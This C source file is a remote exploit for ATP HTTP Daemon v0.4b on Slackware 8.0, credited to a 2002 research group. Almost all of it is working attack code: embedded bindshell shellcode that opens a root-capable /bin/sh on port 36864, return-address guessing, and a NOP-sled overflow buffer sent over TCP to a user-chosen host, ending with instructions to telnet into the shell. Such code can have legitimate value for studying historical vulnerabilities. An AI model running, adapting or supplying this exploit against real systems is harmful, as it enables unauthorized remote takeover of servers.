/* PRPatphttpd.c
 *
 *    This program is free software; you can redistribute it and/or modify
 *    it under the terms of the GNU General Public License as published by
 *    the Free Software Foundation; either version 2 of the License, or
 *    (at your option) any later version.
 *
 *    This program is distributed in the hope that it will be useful,
 *    but WITHOUT ANY WARRANTY; without even the implied warranty of
 *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *    GNU General Public License for more details.
 *
 *    You should have received a copy of the GNU General Public License
 *    along with this program; if not, write to the Free Software
 *    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *
 *    -
 *
 *    PYR/\MID, Research Project
 *    Author: thread
 *    Date: 05/10/02
 *    Members: Apm, flea, thread
 *
 *    Proof of Concept Remote Exploit for ATP HTTP Daemon v0.4b
 *
 *    Tested on:
 *    i386 Slackware 8.0
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>


/* Constants */

#define BINDSHELL_PORT		36864
#define ARCHS			1


/* External variables */

extern int errno, h_errno; // Already declared in the headers


/* Here is a bindshell(code) */

char bindshell[] =
	"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c"
	"\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46"
	"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89"
	"\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c"
	"\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66"
	"\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86"
	"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f"
	"\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
	"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";


struct arch {
	int id;
	char *arch;
	long ret;
	int start_byte;
} arch[] = {
	{ 1, "ATP HTTP Daemon v0.4b/i386 Slackware 8.0", 0xbffff7ec, 600 }
};

	/* Note that this return address doesn't precisly point to the start
	 * of buffer's string (without any environment variables except '_')!
	 * It points to somewhere in the first 2/4 of buffer's memory,
	 * depending of the memory used by environment variables.
	 * This is useful to make some compatibility for systems with
	 * different environments.
	 */


/* Prototypes */

int gen_rand(int min, int max);
long get_ret(long base_ret, int bytes);

int main(int argc, char **argv) {
	int fd, i, arch_num, tmp;
	long ret;
	struct sockaddr_in host;
	struct hostent *he;
	char buffer[803];


	printf( "PYR/\\MID, Research Project 02\n"
		"ATP HTTP Daemon v0.4b Remote Exploit, by thread\n\n");


	/* Checking args */

	if (argc == 2 && !strcmp(argv[1], "-h")) {
		printf( "<arch>\n"
			"Valid architectures:\n");
		for (i = 0; i < ARCHS; i++) {
			printf("\t%d - %s - 0x%lx\n",
						arch[i].id,
						arch[i].arch,
						arch[i].ret);
		}
		printf( "\n"
			"<environment memory>\n"
			"If you have no idea about remote atphttpd environment "
			"you should use one of next\n"
		        "options for this argument:\n"
			"\n"
			"\t0  - Uses a default return address that works "
				"in the most 'default'\n"
			       	"\t     slackware envrionments (between 520 and"
				" 675 bytes of memory)\n"
			"\n"
			"\t-1 - Generates a random number that will point "
				"to a valid return address\n"
			       	"\t     that works in a specific range of "
		       		"memory used by the environment\n"
				"\t     (good luck ;)\n"
			"\n"
			"NOTE: A high return address value means less "
			"environment memory used\n\n");
		return -1;
	} else if (argc < 5) {
		printf( "Synopsis: %s [-h] <hostname> <port> <arch> "
			"<environment memory>\n"
			"\n"
			"-h\t\t\t- Use this flag as unique argument to "
			"display a detailed\n"
			"\t\t\t  help for <arch> and <environment memory> "
			"arguments\n"
			"\n"
			"<hostname>\t\t- Remote hostname or ip address\n"
			"<port>\t\t\t- Remote port\n"
			"<arch>\t\t\t- Architecture\n"
			"<environment memory>\t- It's the number of "
			"bytes that the environment (where\n"
			"\t\t\t  atphttpd runs) uses in memory.\n"
			"\n", argv[0]);
		return -1;
	}


	/* Calculating a new return address */

	printf("Calculating a new return address... ");
	fflush(stdout);

	arch_num = atoi(argv[3]) - 1;

	ret = get_ret(arch[arch_num].ret, atoi(argv[4]));

	printf("Done: 0x%lx\n", ret);


	/* Resolving hostname */

	printf("Resolving hostname (%s)... ", argv[1]);
	fflush(stdout);

	if (!(he = gethostbyname(argv[1]))) {
		fprintf(stderr, "Error: gethostbyname(): %s\n",
				hstrerror(h_errno));
		return -1;
	} else {
		char *r_ip = (char *) &host.sin_addr.s_addr;
		host.sin_addr.s_addr = *((unsigned long *) *he->h_addr_list);
		printf("Resolved to: %u.%u.%u.%u\n",
					(unsigned char) r_ip[0],
					(unsigned char) r_ip[1],
					(unsigned char) r_ip[2],
					(unsigned char) r_ip[3]);
	}


	/* Setting remote port and protocol family */

	host.sin_port = htons(atoi(argv[2]));
	host.sin_family = AF_INET;


	/* Creating an end-point for comunication */

	printf("Creating an end-point for comunication... ");
	fflush(stdout);

	if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		fprintf(stderr, "Error: socket(): %s\n", strerror(errno));
		return -1;
	}

	printf("Done\n");


	/* Connecting to the remote host */

	printf("Connecting to the remote host... ");
	fflush(stdout);

	if (connect(fd, (struct sockaddr *) &host,
				sizeof(struct sockaddr)) < 0) {
		fprintf(stderr, "Error: connect(): %s\n", strerror(errno));
		return -1;
	}

	printf("Connected\n");


	/* Crafting the string */

	memset(buffer, '\x90', sizeof(buffer));	// Fill buffer with NOPs

	/* The return address is somewhere around here.
	 * It changes a lot of times because
	 * the environment changes the buffer's place,
	 * so lets fill the memory's field
	 * where the return address is used to be:
	 */

	for (tmp = sizeof(buffer) - sizeof(long) - 3,
			i = arch[arch_num].start_byte; i < tmp;
				i += sizeof(long))
		*(long *)&buffer[i] = ret;

	memcpy((buffer + sizeof(buffer) - 1) - 3 - strlen(bindshell)
		       	- ((sizeof(buffer) - arch[arch_num].start_byte) + 1),
			bindshell, strlen(bindshell));	/* put the code right
							 * before the ret addr
							 * and ignore the '\0'
							 * and LF/CR chars
							 */

	buffer[sizeof(buffer) - 3] = '\n';
	buffer[sizeof(buffer) - 2] = '\r';
	buffer[sizeof(buffer) - 1] = 0;


	/* Now sending the crafted string to the remote host */

	printf("Sending buffer to the remote host... ");
	fflush(stdout);

	if (write(fd, buffer, strlen(buffer)) < 0) {
		fprintf(stderr, "Error: write(): %s\n", strerror(errno));
		return -1;
	}

	printf("Sent\n");


	/* Close the file descriptor */

	printf("Closing the connection... ");
	fflush(stdout);

	if (close(fd) < 0) {
		fprintf(stderr, "Error: close(): %s\n", strerror(errno));
		return -1;
	}

	printf("Closed\n");

	printf("\nNow try: telnet %s %d\n", argv[1], BINDSHELL_PORT);

	return 0;
}

int gen_rand(int min, int max) {
	struct timeval tv;
	gettimeofday(&tv, NULL);
	srand(tv.tv_usec);
	return (min + (rand() % (max / 2)));
}

long get_ret(long base_ret, int bytes) {
	if (!bytes)
		return 0xbffff4ec;
	if (bytes < 0)
		return get_ret(base_ret, gen_rand(5, 1500));

	return ((base_ret - bytes) - ((bytes >> 8) << 3));
				/*   ^^^^^^^^^^^^^^^^^^^	*/
				/* This will try to reduce the	*/
				/* error tax of the result	*/

	/* Note that this isn't an exact calculation! This will return
	 * a value that should point to somewhere in the first 2/4 of
	 * buffer's memory. This should work for 90% of the cases.
	 */
}